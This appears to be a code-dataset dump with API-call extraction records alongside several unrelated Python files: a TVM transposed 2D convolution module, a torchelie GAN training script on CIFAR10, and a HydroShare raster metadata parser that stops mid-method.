args.batch_size, total_num_batches, args.k, args.\n size_psi_hidden, args.size_psi_lowrank, args.bottleneck, output_dim=\n args.human_size, input_dim=args.input_size, dropout=args.dropout_p,\n residual_output=args.residual_velocities, init_state_noise=args.\n init_state_noise)\n', (3072, 3423), False, 'import mtfixb_model\n'), ((3793, 4218), 'mtfixb_model2.MTGRU_NoBias', 'mtfixb_model2.MTGRU_NoBias', (['args.seq_length_out', 'args.decoder_size', 'args.decoder_size2', 'args.batch_size', 'total_num_batches', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.bottleneck'], {'output_dim': 'args.human_size', 'input_dim': 'args.input_size', 'dropout': 'args.dropout_p', 'residual_output': 'args.residual_velocities', 'init_state_noise': 'args.init_state_noise', 'mt_rnn': 'args.mt_rnn', 'psi_affine': 'args.psi_affine'}), '(args.seq_length_out, args.decoder_size, args.\n decoder_size2, args.batch_size, total_num_batches, args.k, args.\n size_psi_hidden, args.size_psi_lowrank, args.bottleneck, output_dim=\n args.human_size, input_dim=args.input_size, dropout=args.dropout_p,\n residual_output=args.residual_velocities, init_state_noise=args.\n init_state_noise, mt_rnn=args.mt_rnn, psi_affine=args.psi_affine)\n', (3819, 4218), False, 'import mtfixb_model2\n'), ((12744, 12760), 'numpy.zeros', 'np.zeros', (['(n, n)'], {}), '((n, n))\n', (12752, 12760), True, 'import numpy as np\n'), ((12772, 12794), 'numpy.indices', 'np.indices', (['Prec.shape'], {}), '(Prec.shape)\n', (12782, 12794), True, 'import numpy as np\n'), ((12894, 12912), 'torch.tensor', 'torch.tensor', (['Prec'], {}), '(Prec)\n', (12906, 12912), False, 'import torch\n'), ((15429, 15532), 'mtfixb_model.DataIterator', 'mtfixb_model.DataIterator', (['train_set_Y', 'train_set_U', '(64)'], {'min_size': '(64)', 'overlap2': 'args.overlap_windows'}), '(train_set_Y, train_set_U, 64, min_size=64,\n overlap2=args.overlap_windows)\n', (15454, 15532), False, 'import mtfixb_model\n'), ((15680, 15706), 'parseopts.parse_args', 'parseopts.parse_args', (['args'], {}), '(args)\n', (15700, 15706), False, 'import parseopts\n'), ((15718, 15755), 'parseopts.initial_arg_transform', 'parseopts.initial_arg_transform', (['args'], {}), '(args)\n', (15749, 15755), False, 'import parseopts\n'), ((15787, 15829), 'os.makedirs', 'os.makedirs', (['args.train_dir'], {'exist_ok': '(True)'}), '(args.train_dir, exist_ok=True)\n', (15798, 15829), False, 'import os\n'), ((1658, 1699), 'torch.load', 'torch.load', (['args.load'], {'map_location': '"""cpu"""'}), "(args.load, map_location='cpu')\n", (1668, 1699), False, 'import torch\n'), ((1721, 1742), 'torch.load', 'torch.load', (['args.load'], {}), '(args.load)\n', (1731, 1742), False, 'import torch\n'), ((4649, 4682), 'numpy.isclose', 'np.isclose', (['args.first3_prec', '(1.0)'], {}), '(args.first3_prec, 1.0)\n', (4659, 4682), True, 'import numpy as np\n'), ((5194, 5245), 'torch.optim.SGD', 'optim.SGD', (['pars_lrs'], {'weight_decay': 'args.weight_decay'}), '(pars_lrs, weight_decay=args.weight_decay)\n', (5203, 5245), True, 'import torch.optim as optim\n'), ((6048, 6059), 'time.time', 'time.time', ([], {}), '()\n', (6057, 6059), False, 'import time\n'), ((12982, 13029), 'torch.load', 'torch.load', (['layer1_filename'], {'map_location': '"""cpu"""'}), "(layer1_filename, map_location='cpu')\n", (12992, 13029), False, 'import torch\n'), ((13046, 13073), 'torch.load', 'torch.load', (['layer1_filename'], {}), '(layer1_filename)\n', (13056, 13073), False, 'import torch\n'), ((14431, 14477), 'os.path.join', 'os.path.join', (['args.data_dir', 'args.output_fname'], {}), '(args.data_dir, args.output_fname)\n', (14443, 14477), False, 'import os\n'), ((14505, 14550), 'os.path.join', 'os.path.join', (['args.data_dir', 'args.input_fname'], {}), '(args.data_dir, args.input_fname)\n', (14517, 14550), False, 'import os\n'), ((443, 484), 'torch.load', 'torch.load', (['args.load'], {'map_location': '"""cpu"""'}), "(args.load, map_location='cpu')\n", (453, 484), False, 'import torch\n'), ((506, 527), 'torch.load', 'torch.load', (['args.load'], {}), '(args.load)\n', (516, 527), False, 'import torch\n'), ((5313, 5398), 'torch.optim.SGD', 'optim.SGD', (['pars_lrs'], {'momentum': '(0.8)', 'nesterov': '(True)', 'weight_decay': 'args.weight_decay'}), '(pars_lrs, momentum=0.8, nesterov=True, weight_decay=args.weight_decay\n )\n', (5322, 5398), True, 'import torch.optim as optim\n'), ((6345, 6396), 'torch.sigmoid', 'torch.sigmoid', (['(3 * model.mt_net.Z_logit_s[c_ids, :])'], {}), '(3 * model.mt_net.Z_logit_s[c_ids, :])\n', (6358, 6396), False, 'import torch\n'), ((7157, 7170), 'torch.log', 'torch.log', (['sd'], {}), '(sd)\n', (7166, 7170), False, 'import torch\n'), ((8091, 8109), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (8107, 8109), False, 'import sys\n'), ((11630, 11648), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (11646, 11648), False, 'import sys\n'), ((14354, 14402), 'os.path.join', 'os.path.join', (['args.data_dir', 'args.stylelkp_fname'], {}), '(args.data_dir, args.stylelkp_fname)\n', (14366, 14402), False, 'import os\n'), ((5457, 5529), 'torch.optim.Adam', 'optim.Adam', (['pars_lrs'], {'betas': '(0.9, 0.999)', 'weight_decay': 'args.weight_decay'}), '(pars_lrs, betas=(0.9, 0.999), weight_decay=args.weight_decay)\n', (5467, 5529), True, 'import torch.optim as optim\n'), ((7929, 7940), 'time.time', 'time.time', ([], {}), '()\n', (7938, 7940), False, 'import time\n'), ((12074, 12098), 'torch.from_numpy', 'torch.from_numpy', (['inputs'], {}), '(inputs)\n', (12090, 12098), False, 'import torch\n'), ((12131, 12156), 'torch.from_numpy', 'torch.from_numpy', (['outputs'], {}), '(outputs)\n', (12147, 12156), False, 'import torch\n'), ((7235, 7256), 'torch.exp', 'torch.exp', (['(2 * logstd)'], {}), '(2 * logstd)\n', (7244, 7256), False, 'import torch\n'), ((15587, 15608), 'torch.from_numpy', 'torch.from_numpy', (['arg'], {}), '(arg)\n', (15603, 15608), False, 'import torch\n'), ((6658, 6695), 'torch.ones', 'torch.ones', (['(1)', '(1)', '(args.human_size - 3)'], {}), '(1, 1, args.human_size - 3)\n', (6668, 6695), False, 'import torch\n'), ((6609, 6628), 'torch.ones', 'torch.ones', (['(1)', '(1)', '(3)'], {}), '(1, 1, 3)\n', (6619, 6628), False, 'import torch\n'), ((6631, 6656), 'numpy.sqrt', 'np.sqrt', (['args.first3_prec'], {}), '(args.first3_prec)\n', (6638, 6656), True, 'import numpy as np\n')] |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable, unused-argument
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
import collections
import tvm
from tvm import relay, te
from ..utils import simplify
from .dilate import dilate
from .pad import pad
from .utils import get_pad_tuple
def _ntuple(n):
def parse(x):
if isinstance(x, collections.abc.Iterable):
assert len(x) == n, f"Input can only have {n} elements, but got {len(x)} instead: {x}."
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def conv2d_transpose_nchw(Input, Filter, strides, padding, out_dtype, output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return declaration_conv2d_transpose_impl(
Input, Filter, strides, padding, out_dtype, output_padding=output_padding
)
def conv2d_transpose_nchw_preprocess(data, kernel, strides, padding, out_dtype, output_padding):
"""Preprocess data and kernel to make the compute pattern
of conv2d_transpose the same as conv2d"""
batch, in_c, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert opad_h < stride_h and opad_w < stride_w
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_c, filter_h, filter_w),
lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
return data_pad, kernel_transform
def declaration_conv2d_transpose_impl(data, kernel, strides, padding, out_dtype, output_padding):
"""Implementation of conv2d transpose"""
data_pad, kernel_transform = conv2d_transpose_nchw_preprocess(
data, kernel, strides, padding, out_dtype, output_padding
)
batch, in_c, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_c = simplify(out_c)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_c), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
Output = te.compute(
(batch, out_c, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[b, dc, h + dh, w + dw].astype(out_dtype)
* kernel_transform[c, dc, dh, dw].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="conv2d_transpose_nchw",
)
return Output
def group_conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding, groups):
"""Group convolution operator in NCHW layout.
Parameters
----------
data : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.te.Tensor
4-D with shape [in_channel, out_channel // groups, filter_height, filter_width]
stride : int or a list/tuple of two ints
Stride size, or [stride_height, stride_width]
padding : int or a list/tuple of 2 or 4 ints
padding size, or
[pad_height, pad_width] for 2 ints, or
[pad_top, pad_left, pad_bottom, pad_right] for 4 ints
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
groups : int
number of groups
out_dtype : str
The output type. This is used for mixed precision.
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
if groups == 1:
return conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding)
# some pre-processing and prelimnary checks
if out_dtype is None:
out_dtype = data.dtype
batch, in_channels, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
assert (
in_channels % groups == 0
), f"input channels {in_channels} must divide group size {groups}"
# assert out_c % groups == 0, f"output channels {in_c} must divide group size {groups}"
strides = _pair(stride)
# padding = _pair(padding)
# output_padding = _pair(output_padding)
# dilation = _pair(dilation)
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert (
opad_h < stride_h and opad_w < stride_w
), f"[{output_padding}] opad_h:{opad_h} < stride_h:{stride_h} \
and opad_w:{opad_w} < stride_w:{stride_w} does not satisfy."
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_channels, filter_h, filter_w),
lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
batch, in_channels, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_channels = simplify(out_c * groups)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_channels // groups), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
# data: batch, in_channels, out_h, out_w
# weight: out_channels // G, in_channels, out_h, out_w
return te.compute(
(batch, out_channels, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[
b, c // (out_channels // groups) * (in_channels // groups) + dc, h + dh, w + dw
].astype(out_dtype)
* kernel_transform[
c % (out_channels // groups),
c // (out_channels // groups) * (in_channels // groups) + dc,
dh,
dw,
].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="group_conv2d_transpose_nchw",
)
def layout_transform(tensor: "relay.Expr", current_layout: str, desired_layout: str):
"""Transform a tensor with the current layout to the desired layout.
E.g. layout_transform(t, "NCHW", "CNHW") --> relay.transpose(t, [1, 0, 2, 3])
Parameters
----------
tensor: relay.Expr
The Tensor to transpose
current_layout: str
The current layout e.g. NCHW or OIHW
desired_layout: str
The desired layout, must be compatible with current_layout
Returns
-------
The layout_transformed tensor.
"""
if sorted(current_layout) != sorted(desired_layout):
raise ValueError(f"Incompatible layouts: {current_layout} vs {desired_layout}")
if current_layout == desired_layout:
return tensor
current_layout_map = {c: i for i, c in enumerate(current_layout)}
desired_layout_map = {c: i for i, c in enumerate(desired_layout)}
axes = [None] * len(current_layout)
for c, i in desired_layout_map.items():
axes[i] = current_layout_map[c]
return relay.transpose(tensor, axes=axes)
@tvm.target.generic_func
def conv2d_transpose_legalize(attrs, inputs, types):
"""Legalizes Transposed 2D convolution op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed 2D convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
data, kernel = inputs
kernel_layout = attrs["kernel_layout"]
if attrs["data_layout"] == "NHWC":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
# Set new attrs for conv2d_transpose.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs["data_layout"] = "NCHW"
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
# Convert data to NCHW.
data = relay.transpose(data, axes=(0, 3, 1, 2))
deconv = relay.nn.conv2d_transpose(data, kernel, **new_attrs)
# Convert back to original NHWC layout.
out = relay.transpose(deconv, axes=(0, 2, 3, 1))
return out
if attrs["data_layout"] == "NCHW":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
new_attrs = {k: attrs[k] for k in attrs.keys()}
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
return relay.nn.conv2d_transpose(data, kernel, **new_attrs)
return None
| [
"tvm.relay.nn.conv2d_transpose",
"tvm.relay.transpose",
"tvm.te.compute",
"tvm.te.reduce_axis"
] | [((3445, 3589), 'tvm.te.compute', 'te.compute', (['(out_c, in_c, filter_h, filter_w)', '(lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w])'], {'name': '"""kernel_transform"""'}), "((out_c, in_c, filter_h, filter_w), lambda o, i, h, w: kernel[i][\n o][filter_h - 1 - h][filter_w - 1 - w], name='kernel_transform')\n", (3455, 3589), False, 'from tvm import relay, te\n'), ((4188, 4224), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, in_c)'], {'name': '"""dc"""'}), "((0, in_c), name='dc')\n", (4202, 4224), False, 'from tvm import relay, te\n'), ((4234, 4274), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_h)'], {'name': '"""dh"""'}), "((0, filter_h), name='dh')\n", (4248, 4274), False, 'from tvm import relay, te\n'), ((4284, 4324), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_w)'], {'name': '"""dw"""'}), "((0, filter_w), name='dw')\n", (4298, 4324), False, 'from tvm import relay, te\n'), ((7312, 7462), 'tvm.te.compute', 'te.compute', (['(out_c, in_channels, filter_h, filter_w)', '(lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w])'], {'name': '"""kernel_transform"""'}), "((out_c, in_channels, filter_h, filter_w), lambda i, o, h, w:\n kernel[o][i][filter_h - 1 - h][filter_w - 1 - w], name='kernel_transform')\n", (7322, 7462), False, 'from tvm import relay, te\n'), ((7764, 7817), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, in_channels // groups)'], {'name': '"""dc"""'}), "((0, in_channels // groups), name='dc')\n", (7778, 7817), False, 'from tvm import relay, te\n'), ((7827, 7867), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_h)'], {'name': '"""dh"""'}), "((0, filter_h), name='dh')\n", (7841, 7867), False, 'from tvm import relay, te\n'), ((7877, 7917), 'tvm.te.reduce_axis', 'te.reduce_axis', (['(0, filter_w)'], {'name': '"""dw"""'}), "((0, filter_w), name='dw')\n", (7891, 7917), False, 'from tvm import relay, te\n'), ((9642, 9676), 'tvm.relay.transpose', 'relay.transpose', (['tensor'], {'axes': 'axes'}), '(tensor, axes=axes)\n', (9657, 9676), False, 'from tvm import relay, te\n'), ((10650, 10690), 'tvm.relay.transpose', 'relay.transpose', (['data'], {'axes': '(0, 3, 1, 2)'}), '(data, axes=(0, 3, 1, 2))\n', (10665, 10690), False, 'from tvm import relay, te\n'), ((10708, 10760), 'tvm.relay.nn.conv2d_transpose', 'relay.nn.conv2d_transpose', (['data', 'kernel'], {}), '(data, kernel, **new_attrs)\n', (10733, 10760), False, 'from tvm import relay, te\n'), ((10823, 10865), 'tvm.relay.transpose', 'relay.transpose', (['deconv'], {'axes': '(0, 2, 3, 1)'}), '(deconv, axes=(0, 2, 3, 1))\n', (10838, 10865), False, 'from tvm import relay, te\n'), ((11190, 11242), 'tvm.relay.nn.conv2d_transpose', 'relay.nn.conv2d_transpose', (['data', 'kernel'], {}), '(data, kernel, **new_attrs)\n', (11215, 11242), False, 'from tvm import relay, te\n')] |
import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss':
fake_loss.item()}
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
| [
"copy.deepcopy",
"argparse.ArgumentParser",
"torchelie.transforms.AdaptPad",
"torchelie.callbacks.Log",
"torchelie.loss.gan.hinge.generated",
"torchvision.transforms.RandomHorizontalFlip",
"torchelie.callbacks.WindowedMetricAvg",
"torchelie.callbacks.Polyak",
"torchvision.datasets.CIFAR10",
"torch... | [((321, 346), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (344, 346), False, 'import argparse\n'), ((607, 671), 'torchvision.datasets.CIFAR10', 'CIFAR10', (['"""~/.cache/torch/cifar10"""'], {'download': '(True)', 'transform': 'tfms'}), "('~/.cache/torch/cifar10', download=True, transform=tfms)\n", (614, 671), False, 'from torchvision.datasets import MNIST, CIFAR10\n'), ((677, 752), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['ds'], {'num_workers': '(4)', 'batch_size': 'BS', 'shuffle': '(True)'}), '(ds, num_workers=4, batch_size=BS, shuffle=True)\n', (704, 752), False, 'import torch\n'), ((497, 510), 'torchvision.transforms.Resize', 'TF.Resize', (['(64)'], {}), '(64)\n', (506, 510), True, 'import torchvision.transforms as TF\n'), ((516, 549), 'torchelie.transforms.AdaptPad', 'tch.transforms.AdaptPad', (['(64, 64)'], {}), '((64, 64))\n', (539, 549), True, 'import torchelie as tch\n'), ((555, 580), 'torchvision.transforms.RandomHorizontalFlip', 'TF.RandomHorizontalFlip', ([], {}), '()\n', (578, 580), True, 'import torchvision.transforms as TF\n'), ((586, 599), 'torchvision.transforms.ToTensor', 'TF.ToTensor', ([], {}), '()\n', (597, 599), True, 'import torchvision.transforms as TF\n'), ((1033, 1068), 'torch.randn', 'torch.randn', (['BS', '(128)'], {'device': 'device'}), '(BS, 128, device=device)\n', (1044, 1068), False, 'import torch\n'), ((1146, 1171), 'torchelie.loss.gan.hinge.generated', 'gan_loss.generated', (['preds'], {}), '(preds)\n', (1164, 1171), True, 'import torchelie.loss.gan.hinge as gan_loss\n'), ((1298, 1333), 'torch.randn', 'torch.randn', (['BS', '(128)'], {'device': 'device'}), '(BS, 128, device=device)\n', (1309, 1333), False, 'import torch\n'), ((1435, 1470), 'torch.randn', 'torch.randn', (['BS', '(128)'], {'device': 'device'}), '(BS, 128, device=device)\n', (1446, 1470), False, 'import torch\n'), ((932, 948), 'copy.deepcopy', 'copy.deepcopy', (['G'], {}), '(G)\n', (945, 948), False, 'import copy\n'), ((1843, 1905), 'torchelie.recipes.gan.GANRecipe', 'GANRecipe', (['G', 'D', 'G_fun', 'D_fun', 'G_polyak_fun', 'dl'], {'log_every': '(100)'}), '(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100)\n', (1852, 1905), False, 'from torchelie.recipes.gan import GANRecipe\n'), ((2089, 2112), 'torchelie.callbacks.Polyak', 'tcb.Polyak', (['G', 'G_polyak'], {}), '(G, G_polyak)\n', (2099, 2112), True, 'import torchelie.callbacks as tcb\n'), ((2204, 2227), 'torchelie.callbacks.Log', 'tcb.Log', (['"""batch.0"""', '"""x"""'], {}), "('batch.0', 'x')\n", (2211, 2227), True, 'import torchelie.callbacks as tcb\n'), ((2237, 2271), 'torchelie.callbacks.WindowedMetricAvg', 'tcb.WindowedMetricAvg', (['"""real_loss"""'], {}), "('real_loss')\n", (2258, 2271), True, 'import torchelie.callbacks as tcb\n'), ((2281, 2315), 'torchelie.callbacks.WindowedMetricAvg', 'tcb.WindowedMetricAvg', (['"""fake_loss"""'], {}), "('fake_loss')\n", (2302, 2315), True, 'import torchelie.callbacks as tcb\n'), ((2461, 2491), 'torchelie.callbacks.Log', 'tcb.Log', (['"""imgs"""', '"""polyak_imgs"""'], {}), "('imgs', 'polyak_imgs')\n", (2468, 2491), True, 'import torchelie.callbacks as tcb\n'), ((2501, 2540), 'torchelie.callbacks.VisdomLogger', 'tcb.VisdomLogger', (['"""main"""'], {'prefix': '"""test"""'}), "('main', prefix='test')\n", (2517, 2540), True, 'import torchelie.callbacks as tcb\n')] |
import xml.sax
import rdflib
from django.db import transaction
from hs_core.serialization import GenericResourceMeta
class RasterResourceMeta(GenericResourceMeta):
"""
Lightweight class for representing metadata of RasterResource instances.
"""
def __init__(self):
super(RasterResourceMeta, self).__init__()
self.cell_info = None
self.band_info = []
self.spatial_reference = None
def _read_resource_metadata(self):
super(RasterResourceMeta, self)._read_resource_metadata()
print("--- RasterResourceMeta ---")
# Also parse using SAX so that we can capture certain metadata elements
# in the same order in which they appear in the RDF+XML serialization.
SAX_parse_results = RasterResourceSAXHandler()
xml.sax.parse(self.rmeta_path, SAX_parse_results)
hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
# Get CellInformation
for s, p, o in self._rmeta_graph.triples((None, hsterms.CellInformation, None)):
self.cell_info = RasterResourceMeta.CellInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for CellInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.name = str(name_lit)
# Get rows
rows_lit = self._rmeta_graph.value(o, hsterms.rows)
if rows_lit is None:
msg = "Rows attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.rows = int(str(rows_lit))
# Get columns
columns_lit = self._rmeta_graph.value(o, hsterms.columns)
if columns_lit is None:
msg = "Columns attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.columns = int(str(columns_lit))
# Get cellSizeXValue
cellX_lit = self._rmeta_graph.value(o, hsterms.cellSizeXValue)
if cellX_lit is None:
msg = "cellSizeXValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeXValue = float(str(cellX_lit))
# Get cellSizeYValue
cellY_lit = self._rmeta_graph.value(o, hsterms.cellSizeYValue)
if cellY_lit is None:
msg = "cellSizeYValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeYValue = float(str(cellY_lit))
# Get cellDataType
celldt_lit = self._rmeta_graph.value(o, hsterms.cellDataType)
if celldt_lit is None:
msg = "cellDataType attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellDataType = str(celldt_lit)
# Get noDateValue
nodata_lit = self._rmeta_graph.value(o, hsterms.noDataValue)
if nodata_lit is not None:
self.cell_info.noDataValue = float(str(nodata_lit))
print("\t\t{0}".format(self.cell_info))
# Get BandInformation
if SAX_parse_results:
# Use band info from SAX parser
self.band_info = list(SAX_parse_results.band_info)
else:
# Get band info from RDF
for s, p, o in self._rmeta_graph.triples((None, hsterms.BandInformation, None)):
band_info = RasterResourceMeta.BandInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.name = str(name_lit)
# Get variableName
varname_lit = self._rmeta_graph.value(o, hsterms.variableName)
if varname_lit is None:
msg = "variableName for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableName = str(varname_lit)
# Get variableUnit
varunit_lit = self._rmeta_graph.value(o, hsterms.variableUnit)
if varunit_lit is None:
msg = "variableUnit for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableUnit = str(varunit_lit)
# Get method
method_lit = self._rmeta_graph.value(o, hsterms.method)
if method_lit is not None:
band_info.method = str(method_lit)
# Get comment
comment_lit = self._rmeta_graph.value(o, hsterms.comment)
if comment_lit is not None:
band_info.comment = str(comment_lit)
self.band_info.append(band_info)
for b in self.band_info:
print("\t\t{0}".format(str(b)))
# Get spatialReference
for s, p, o in self._rmeta_graph.triples((None, hsterms.spatialReference, None)):
spat_ref_lit = self._rmeta_graph.value(o, rdflib.namespace.RDF.value)
if spat_ref_lit is None:
msg = "Spatial reference value not found for {0}.".format(o)
raise GenericResourceMeta.ResourceMetaException(msg)
self.spatial_reference = RasterResourceMeta.SpatialReference(str(spat_ref_lit))
print("\t\t{0}".format(self.spatial_reference))
@transaction.atomic
def write_metadata_to_resource(self, resource):
"""
Write metadata to resource
:param resource: RasterResource instance
"""
